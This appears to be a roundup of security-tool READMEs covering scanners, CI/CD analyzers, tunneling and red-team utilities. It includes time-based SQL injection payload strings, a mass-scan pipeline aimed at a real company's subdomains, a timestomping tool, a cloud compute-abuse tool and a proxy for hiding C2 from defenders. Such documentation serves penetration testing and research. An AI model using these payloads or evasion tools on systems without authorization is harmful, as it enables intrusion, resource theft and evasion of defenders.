secbutler
is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
secbutler -h
This will display the help for the tool
__ __ __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/
v0.1.9 - https://github.com/groundsec/secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
secbutler [flags]
secbutler [command]
Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists
Flags:
-h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
secbutler is made with π€ by the GroundSec team and released under the MIT LICENSE.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
This will display help for the tool. Here are all the options it supports.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
ββββββββ βββββββ βββ βββ ββββββββββββ βββββββββββββ βββββββββββββββ
ββββββββββββββββββββ βββ βββββββββββββ ββββββββββββββββββββββββββββββ
ββββββββββ ββββββ βββ ββββββββββββββ ββββββββββββββββββββ ββββββββ
βββββββββββββ ββββββ βββ ββββββββββββββββββββββββββββ ββββββ ββββββββ
βββββββββββ ββββββββββββββββ βββββββββββ ββββββββββββ βββββββββββ βββ
ββββββββ βββββββ βββββββββββ βββββββββββ βββββββββββ βββββββββββ βββ
-: By Muhammad Danial :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads
The url can be provided with -u flag
for single site scan
./sqlisniper.py -u http://example.com
The -r flag
allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
The SqliSniper can also worked with the pipeline input with -p flag
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
By default the SqliSniper use the payloads.txt file. However --payload flag
can be used for providing custom payloads file.
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%
. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
ubuntu:~/sqlisniper$ cat payloads.txt
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
If you want to only test with the single payload --single-payload flag
can be used. Make sure to replace the sleep time with %__TIME_OUT__%
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
Threads can be defined with --threads flag
./sqlisniper.py -r url.txt --threads 10
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.
SqliSniper
is made inΒ pythonΒ with lots of <3 by @Muhammad Danial.
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
requirements.txt
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
Faradayβs researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.
This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZβs implementation of Hikvisionβs Search Active Devices Protocol (SADP) and SDK server:
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model | Affected Versions |
---|---|
CS-C6N-B0-1G2WF | Versions below V5.3.0 build 230215 |
CS-C6N-R101-1G2WF | Versions below V5.3.0 build 230215 |
CS-CV310-A0-1B2WFR | Versions below V5.3.0 build 230221 |
CS-CV310-A0-1C2WFR-C | Versions below V5.3.2 build 230221 |
CS-C6N-A0-1C2WFR-MUL | Versions below V5.3.2 build 230218 |
CS-CV310-A0-3C2WFRL-1080p | Versions below V5.2.7 build 230302 |
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p | Versions below V5.3.2 build 230214 |
CS-CV248-A0-32WMFR | Versions below V5.2.3 build 230217 |
EZVIZ LC1C | Versions below V5.3.4 build 230214 |
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Oceanβs Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit project's wiki.
BounceBack currently supports the following filters:
Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators
Rules configuration page may be found here.
At the moment, BounceBack supports the following protocols:
Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.
Proxies configuration page may be found here.
Just download latest release from release page, unzip it, edit config file and go on.
If you want to build it from source, install goreleaser and run:
goreleaser release --clean --snapshot
Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain
Built upon djhohnstein's SharpShares project
> .\SharpShares.exe help
Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt
Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
default: SYSVOL,NETLOGON,IPC$,PRINT$
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares
execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$
The /ldap
and /ou
flags can be used together or seprately to generate a list of hosts to enumerate.
All hosts returned from these flags are combined and deduplicated before enumeration starts.
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]
--mode
: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.--url
: The GitHub URL. Use USERNAME:TOKEN@URL
for private repos. This parameter is required.--output-folder
: The output folder. The default value is '/tmp'. This parameter is optional.--config
: The config file. This parameter is optional.--verbose
: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.--branch
: The branch name. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--commit
: The commit hash. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--tag
: The tag. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--action-path
: The (relative) path to the action. You cannot provide --action-path
in repo mode. This parameter is optional.--workflow-path
: The (relative) path to the workflow. You cannot provide --workflow-path
in action mode. This parameter is optional.To use this script to interact with a GitHub repo, you might run a command like the following:
python argus.py --mode repo --url https://github.com/username/repo.git --branch master
This would run the script in repo mode on the master branch of the specified repository.
Argus can be run inside a docker container. To do so, follow the steps:
results
folderYou can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif
) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif
) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
If there is an issue with needing the Github authorization for running, you can provide username:TOKEN
in the GITHUB_CREDS
environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},
year={2023},
}
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
See the setup instructions.
See development.md
Post Name | Publication Date | Link |
---|---|---|
Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4 |
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9 |
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6 |
Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:
Tool for analyzing SAP Secure Network Communications (SNC).
In its current state, sncscan
can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan
find out if it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan
and impact the connections security is in the section Background
sncscan -H 10.3.161.3 -S 3200 -p diag
Multiple targets can be scanned with one command:
sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206
sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag
Requirements: Currently the sncscan only works with the pysap libary from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
-Path
: The path to the file or directory whose timestamps you wish to modify.-NewTimestamp
: The new DateTime value you wish to set for the file or directory.-Credentials
: (Optional) If you need to specify a different user's credentials.-Recurse
: (Switch) If specified, apply the timestamp recursively to all files in the given directory.Specify the -Recurse
switch to apply timestamps recursively:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
To know more about our Attack Surface
Management platform, check out NVADR.
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Possible usages for Raven:
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear β the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality β each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1
Another way to setup the environment is by running our provided docker compose file:
git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup
Step 3: Run Raven Downloader
Org mode:
raven download org --token $GITHUB_TOKEN --org-name RavenDemo
Crawl mode:
raven download crawl --token $GITHUB_TOKEN --min-stars 1000
Step 4: Run Raven Indexer
raven index
Step 5: Inspect the results through the reporter
raven report --format raw
At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.
Raven is using two primary docker containers: Redis and Neo4j. make setup
will run a docker compose
command to prepare that environment.
The tool contains three main functionalities, download
and index
and report
.
usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows
usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000
usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False
usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...
positional arguments:
{slack}
slack Send report to slack channel
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)
Retrieve all workflows and actions associated with the organization.
raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug
Scrape all publicly accessible GitHub repositories.
raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug
After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.
raven index --debug
Now, we can generate a report using our query library.
raven report --severity high --tag injection --tag unauthenticated
For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:
Dockerfile
(without action.yml
). Currently, this behavior isn't supported.docker://...
URL. Currently, this behavior isn't supported.data
. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}
, which creates a path for a code execution.GITHUB_ENV
. This may utilize the previous taint analysis as well.actions/github-script
has an interesting threat landscape. If it is, it can be modeled in the graph.If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
Supported web frameworks (route-detect
IDs in parentheses):
django
, django-rest-framework
), Flask (flask
), Sanic (sanic
)laravel
), Symfony (symfony
), CakePHP (cakephp
)rails
), Grape (grape
)jax-rs
), Spring (spring
)gorilla
), Gin (gin
), Chi (chi
)express
), React (react
), Angular (angular
)*Rails support is limited. Please see this issue for more information.
Use pip
to install route-detect
:
$ python -m pip install --upgrade route-detect
You can check that route-detect
is installed correctly with the following command:
$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.
Findings:
/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly
1Γ’ββ print(1 == 1)
Ran 1 rule on 1 file: 1 finding.
route-detect
provides the routes
CLI command and uses semgrep
to search for routes.
Use the which
subcommand to point semgrep
at the correct web application rules:
$ semgrep --config $(routes which django) path/to/django/code
Use the viz
subcommand to visualize route information in your browser:
$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json
If you're not sure which framework to look for, you can use the special all
ID to check everything:
$ semgrep --json --config $(routes which all) --output routes.json path/to/code
If you have custom authn or authz logic, you can copy route-detect
's rules:
$ cp $(routes which django) my-django.yml
Then you can modify the rule as necessary and run it like above:
$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json
route-detect
uses poetry
for dependency and configuration management.
Before proceeding, install project dependencies with the following command:
$ poetry install --with dev
Lint all project files with the following command:
$ poetry run pre-commit run --all-files
Run Python tests with the following command:
$ poetry run pytest --cov
Run Semgrep rule tests with the following command:
$ poetry run semgrep --test --config routes/rules/ tests/test_rules/
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
